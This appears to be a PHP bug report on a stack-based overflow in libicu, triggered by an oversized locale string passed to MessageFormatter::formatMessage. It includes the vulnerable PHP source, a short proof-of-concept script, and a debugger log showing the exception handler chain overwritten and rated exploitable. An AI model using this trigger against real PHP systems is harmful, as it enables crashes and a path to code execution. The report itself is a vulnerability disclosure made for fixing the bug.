Description:
------------
Big locale string causes stack based overflow inside libicu. PHP could mitigate this issue limiting length of the locale to a valid value.
---------------------------------------------------------------------------
Source code:
https://github.com/php/php-src/blob/PHP-7.0.10/ext/intl/msgformat/msgformat_format.c#L98
PHP_FUNCTION( msgfmt_format_message )
{
zval *args;
UChar *spattern = NULL;
int spattern_len = 0;
char *pattern = NULL;
size_t pattern_len = 0;
const char *slocale = NULL;
size_t slocale_len = 0;
MessageFormatter_object mf;
MessageFormatter_object *mfo = &mf;
/* Parse parameters. */
if( zend_parse_method_parameters( ZEND_NUM_ARGS(), getThis(), "ssa",
&slocale, &slocale_len, &pattern, &pattern_len, &args ) == FAILURE )
{
intl_error_set( NULL, U_ILLEGAL_ARGUMENT_ERROR,
"msgfmt_format_message: unable to parse input params", 0 );
RETURN_FALSE;
}
memset(mfo, 0, sizeof(*mfo));
msgformat_data_init(&mfo->mf_data);
if(pattern && pattern_len) {
intl_convert_utf8_to_utf16(&spattern, &spattern_len, pattern, pattern_len, &INTL_DATA_ERROR_CODE(mfo));
Test script:
---------------
<?php
ini_set('memory_limit', -1);
$v1 = str_repeat("ABCE", 503566756/3);
$v2 = "test";
$v3 = [];
MessageFormatter::formatMessage($v1, $v2, $v3);
// msgfmt_format_message($v1, $v2, $v3);
Expected result:
----------------
no crash
Actual result:
--------------
Microsoft (R) Windows Debugger Version 6.11.0001.404 AMD64
Copyright (c) Microsoft Corporation. All rights reserved.
CommandLine: C:toolsphp7010php.exe -n -dextension=extphp_bz2.dll -dextension=extphp_com_dotnet.dll -dextension=extphp_curl.dll -dextension=extphp_enchant.dll -dextension=extphp_exif.dll -dextension=extphp_fileinfo.dll -dextension=extphp_ftp.dll -dextension=extphp_gd2.dll -dextension=extphp_gettext.dll -dextension=extphp_gmp.dll -dextension=extphp_imap.dll -dextension=extphp_intl.dll -dextension=extphp_ldap.dll -dextension=extphp_mbstring.dll -dextension=extphp_mysqli.dll -dextension=extphp_odbc.dll -dextension=extphp_openssl.dll -dextension=extphp_pdo_mysql.dll -dextension=extphp_pdo_odbc.dll -dextension=extphp_pdo_pgsql.dll -dextension=extphp_pdo_sqlite.dll -dextension=extphp_pgsql.dll -dextension=extphp_phpdbg_webhelper.dll -dextension=extphp_shmop.dll -dextension=extphp_soap.dll -dextension=extphp_sockets.dll -dextension=extphp_sqlite3.dll -dextension=extphp_sysvshm.dll -dextension=extphp_tidy.dll -dextension=extphp_xmlrpc.dll -dextension=extphp_xsl.dll -dextension=extphp_yaml.dll poc.php
...
(e5c.d80): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** WARNING: Unable to verify checksum for C:toolsphp7010icuuc57.dll
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:toolsphp7010icuuc57.dll -
Processing initial command 'r;!exploitable -v'
icuuc57!icu_57::Locale::Locale+0x27c:
4a85613c 8801 mov byte ptr [ecx],al ds:002b:05360000=00
0:000:x86> r;!exploitable -v
eax=0535e545 ebx=00000000 ecx=05360000 edx=10201a74 esi=0535e59d edi=00000000
eip=4a85613c esp=0535e55c ebp=0535e64c iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
icuuc57!icu_57::Locale::Locale+0x27c:
4a85613c 8801 mov byte ptr [ecx],al ds:002b:05360000=00
!exploitable 1.6.0.0
HostMachineHostUser
Executing Processor Architecture is x86
Debuggee is in User Mode
Debuggee is a live user mode debugging session on the local machine
Event Type: Exception
Exception Faulting Address: 0x5360000
First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005)
Exception Sub-Type: Write Access Violation
Exception Hash (Major/Minor): 0xbf0ac847.0x9fec2922
Hash Usage : Stack Trace:
Major+Minor : icuuc57!icu_57::Locale::Locale+0x27c
Major+Minor : Unknown
Major+Minor : Unknown
Major+Minor : Unknown
Major+Minor : Unknown
Minor : Unknown
Minor : Unknown
Minor : Unknown
Minor : Unknown
Minor : Unknown
Minor : Unknown
Minor : Unknown
Minor : Unknown
...
Minor : Unknown
Minor : Unknown
Minor : Unknown
Minor : Unknown
Minor : Unknown
Instruction Address: 0x000000004a85613c
Description: Exception Handler Chain Corrupted
Short Description: ExceptionHandlerCorrupted
Exploitability Classification: EXPLOITABLE
Recommended Bug Title: Exploitable - Exception Handler Chain Corrupted starting at icuuc57!icu_57::Locale::Locale+0x000000000000027c (Hash=0xbf0ac847.0x9fec2922)
Corruption of the exception handler chain is considered exploitable
0:000:x86> !exchain
000000000535e640: 0000000043424145
Invalid exception stack at 0000000043424145 // Exception handler overwrote to 'ABCE'
0:000:x86> k
ChildEBP RetAddr
WARNING: Stack unwind information not available. Following frames may be wrong.
0535e64c 43424145 icuuc57!icu_57::Locale::Locale+0x27c
0535e650 43424145 0x43424145
0535e654 43424145 0x43424145
0535e658 43424145 0x43424145
0535e65c 43424145 0x43424145
0535e660 43424145 0x43424145
0535e664 43424145 0x43424145
0535e668 43424145 0x43424145
0535e66c 43424145 0x43424145
0535e670 43424145 0x43424145
0535e674 43424145 0x43424145
0535e678 43424145 0x43424145
0535e67c 43424145 0x43424145
0535e680 43424145 0x43424145
0535e684 43424145 0x43424145
0535e688 43424145 0x43424145
0535e68c 43424145 0x43424145
0535e690 43424145 0x43424145
0535e694 43424145 0x43424145
0535e698 43424145 0x43424145